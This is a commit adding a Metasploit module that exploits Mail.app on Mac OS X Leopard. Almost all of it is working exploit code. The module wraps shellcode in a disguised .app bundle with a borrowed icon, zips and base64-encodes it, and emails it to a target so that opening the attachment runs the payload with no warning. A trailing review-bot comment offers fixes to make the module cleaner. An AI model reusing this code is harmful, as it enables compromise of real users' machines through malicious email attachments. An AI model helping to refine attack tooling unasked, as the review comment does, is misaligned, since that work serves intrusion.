New mail.app exploit for leopard
git-svn-id: file:///home/svn/framework3/trunk@5209 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
907282b061
commit
9b343c7149
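--- /dev/null
+++ b/PATH_NOT_SHOWN/mailapp_image_exec.rb
@@ -0,0 +1,231 @@
+##
+# $Id: mailapp_image_exec.rb 5206 2007-11-26 22:29:07Z hdm $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'rex'
+require 'msf/core'
+require 'zip/zipfilesystem'
+require 'ftools'
+
+module Msf
+
+class Exploits::Osx::Email::MailAppAttachment < Msf::Exploit::Remote
+
+#
+# This module sends email messages via smtp
+#
+include Exploit::Remote::SMTPDeliver
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Mail.app Application Attachment Execution',
+'Description' => %q{
+This module exploits sends an email message to a user containing
+shellcode encoded into an executable attachment. The user does not receive
+any warning dialog when opening this attachment with Mail.app. Tested on 10.5.
+},
+'License' => MSF_LICENSE,
+'Author' => ['hdm', 'Kevin Finisterre <kf[at]digitalmunition.com>'],
+'Version' => '$Revision: 5206 $',
+'References' =>
+[
+# ?
+],
+'Stance' => Msf::Exploit::Stance::Passive,
+'Payload' =>
+{
+'Space' => 8192,
+'DisableNops' => true,
+'BadChars' => "",
+'Compat' =>
+{
+'ConnectionType' => '-bind -find',
+},
+},
+
+'Targets' =>
+[
+[ 'Mail.app - Binary Payloads (x86)',
+{
+'Platform' => 'osx',
+'Arch' => ARCH_X86,
+}
+],
+[ 'Mail.app - Binary Payloads (ppc)',
+{
+'Platform' => 'osx',
+'Arch' => ARCH_PPC,
+}
+],
+],
+'DisclosureDate' => 'Nov 28 2007'
+))
+
+register_options(
+[
+OptString.new('MAILSUBJECT', [false, "The subject of the sent email"]),
+OptString.new('MAILMESSAGE', [false, "This text contents of the email message"])
+], self.class)
+end
+
+def autofilter
+false
+end
+
+def exploit
+
+data = rand_text_alpha(rand(32)+1)
+
+msg = Rex::MIME::Message.new
+msg.mime_defaults
+msg.subject = datastore['MAILSUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
+msg.to = datastore['MAILTO']
+msg.from = datastore['MAILFROM']
+
+txt = datastore['MAILMESSAGE'] || Rex::Text.rand_text_alpha(rand(32)+1)
+
+bin = ''
+
+if(target.arch.index(ARCH_PPC))
+bin = Rex::Text.to_osx_ppc_macho(payload.encoded, '')
+end
+
+if(target.arch.index(ARCH_X86))
+bin = Rex::Text.to_osx_x86_macho(payload.encoded, '')
+end
+
+
+zfd = Tempfile.new('mailappzip')
+
+# XXX: Race condition, fix the Zip API
+File.unlink(zfd.path)
+
+name = rand_text_alpha(rand(4)+4).downcase.capitalize
+
+Zip::ZipFile.open(zfd.path, Zip::ZipFile::CREATE) do |zf|
+
+zf.dir.mkdir("#{name}.app")
+zf.dir.chdir("#{name}.app")
+
+zf.dir.mkdir("Contents")
+zf.dir.chdir("Contents")
+
+zf.file.open("Info.plist", "w") do |fd|
+fd.write(get_info_plist(name))
+end
+
+zf.file.open("PkgInfo", "w") do |fd|
+fd.write("APPL????")
+end
+
+zf.dir.mkdir("MacOS")
+zf.dir.chdir("MacOS")
+zf.file.open(name, "w") do |fd|
+fd.write(bin)
+end
+zf.dir.chdir("..")
+
+zf.dir.mkdir("Resources")
+zf.dir.chdir("Resources")
+zf.file.open("#{name}.icns", "w") do |fd|
+fd.write(get_app_icns())
+end
+end
+
+cmd = Rex::Text.encode_base64(File.read(zfd.path), "\r\n")
+zfd.close
+
+msg.add_part(Rex::Text.encode_base64(txt, "\r\n"), "text/plain", "base64", "inline")
+msg.add_part(cmd , "application/zip; x-mac-auto-archive=yes; name=\"#{name}.app.zip\"", "base64", "attachment; filename=#{name}.app.zip" )
+
+send_message(msg.to_s)
+
+print_status("Waiting for a payload session (backgrounding)...")
+end
+
+
+def get_info_plist(name)
+
+%Q|
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+
+<plist version="1.0">
+
+<dict>
+
+<key>CFBundleDevelopmentRegion</key>
+
+<string>English</string>
+
+<key>CFBundleExecutable</key>
+
+<string>#{name}</string>
+
+<key>CFBundleGetInfoString</key>
+
+<string>2.1.1</string>
+
+<key>CFBundleIconFile</key>
+
+<string>#{name}.icns</string>
+
+<key>CFBundleIdentifier</key>
+
+<string>com.#{name.downcase}</string>
+
+<key>CFBundleInfoDictionaryVersion</key>
+
+<string>6.0</string>
+
+<key>CFBundleName</key>
+
+<string>Busted</string>
+
+<key>CFBundlePackageType</key>
+
+<string>APPL</string>
+
+<key>CFBundleShortVersionString</key>
+
+<string>2.1.1</string>
+
+<key>CFBundleSignature</key>
+
+<string>????</string>
+
+<key>CFBundleVersion</key>
+
+<string>2.1.1</string>
+
+<key>LSHasLocalizedDisplayName</key>
+
+<false/>
+
+<key>NSHumanReadableCopyright</key>
+
+<string>#{name}</string>
+
+</dict>
+
+</plist>
+|
+end
+
+def get_app_icns
+File.read(File.join(Msf::Config.install_root, "data", "exploits", "iceweasel_macosx.icns"))
+end
+
+
+end
+end
+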
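Review bot: The generated archive is never removed in `exploit`: `File.unlink(zfd.path)` deletes the empty Tempfile, `Zip::ZipFile.open` then writes a new file at that path, and the later `zfd.close` only closes the original handle, so the built `.app.zip` is left in the temp directory and on any exception between `Tempfile.new` and `zfd.close` nothing is cleaned up at all. Wrap the archive build and send in a `begin` block whose `ensure` runs `File.unlink(zfd.path) if File.exist?(zfd.path)`, which also makes the `# XXX: Race condition` comment's window shorter since the stray path does not outlive the method. The local `data = rand_text_alpha(rand(32)+1)` at the top of `exploit` is assigned and never read and can be dropped. In the module description, `This module exploits sends an email message` should read `This module sends an email message`, and the MAILMESSAGE option text `This text contents of the email message` should read `The text contents of the email message`.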